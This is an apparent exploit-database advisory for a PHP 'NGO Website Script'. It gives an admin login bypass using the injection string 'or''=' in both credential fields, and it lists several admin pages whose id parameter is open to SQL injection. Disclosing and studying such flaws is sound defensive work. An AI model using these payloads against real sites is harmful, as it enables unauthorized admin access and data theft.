21 lines
No EOL
921 B
Text
21 lines
No EOL
921 B
Text
# # # # #
|
|
# Vulnerability: SQL Injection + Authentication Bypass
|
|
# Date: 18.01.2017
|
|
# Vendor Homepage: http://www.scriptgiant.com/
|
|
# Script Name: NGO Website Script
|
|
# Script Buy Now: http://www.popularclones.com/products/NGO-Website-Script
|
|
# Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Mail : ihsan[beygir]ihsan[nokta]net
|
|
# # # # #
|
|
# Authentication Bypass :
|
|
# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/admin/addnew.event.php?id=[SQL]
|
|
# http://localhost/[PATH]/admin/add_new_photo.php?id=[SQL]
|
|
# http://localhost/[PATH]/admin/add_new_project.php?id=[SQL]
|
|
# http://localhost/[PATH]/admin/add_new_video.php?id=[SQL]
|
|
# http://localhost/[PATH]/admin/addnew.activity.php?id=[SQL]
|
|
# http://localhost/[PATH]/admin/addblog.php?id=[SQL]
|
|
# E.t.c.... Other files, too. SQL There are security vulnerabilities.
|
|
# # # # # |